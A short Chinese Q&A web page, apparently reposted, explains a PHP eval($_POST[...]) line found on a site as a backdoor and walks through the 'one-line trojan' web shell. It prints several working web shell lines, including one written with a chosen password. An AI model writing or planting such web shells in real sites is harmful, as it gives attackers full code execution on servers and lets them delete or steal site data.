网站中出现<?php eval($_POST['posha']);?> 这段代码?什么意思?

网站中出现<?php eval($_POST['posha']);?> 这段代码?什么意思?,第1张

这是一个典型的后门程序,首先我解释一下eval函数的作用,

//eval — 把字符串作为PHP代码执行 

eval('echo 123')//输出123

也就是说,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST['posha']的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行,这个时候就有点可怕了,比如写入一段循环删除整站代码等等。

PHP一句话木马是一种利用PHP的eval函数执行任意代码的后门程序。一般格式为:

<?php @eval ($_POST ['password'])?>

其中,password是连接木马时需要输入的密码,可以自定义。如果您想要写一个密码为file的一句话木马,那么可以这样写:

<?php @eval ($_POST ['file'])?>

请注意,这种木马非常危险,可能导致网站被黑客入侵或破坏,请谨慎使用。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/12065408.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-20
下一篇 2023-05-20

发表评论

登录后才能评论

评论列表(0条)

保存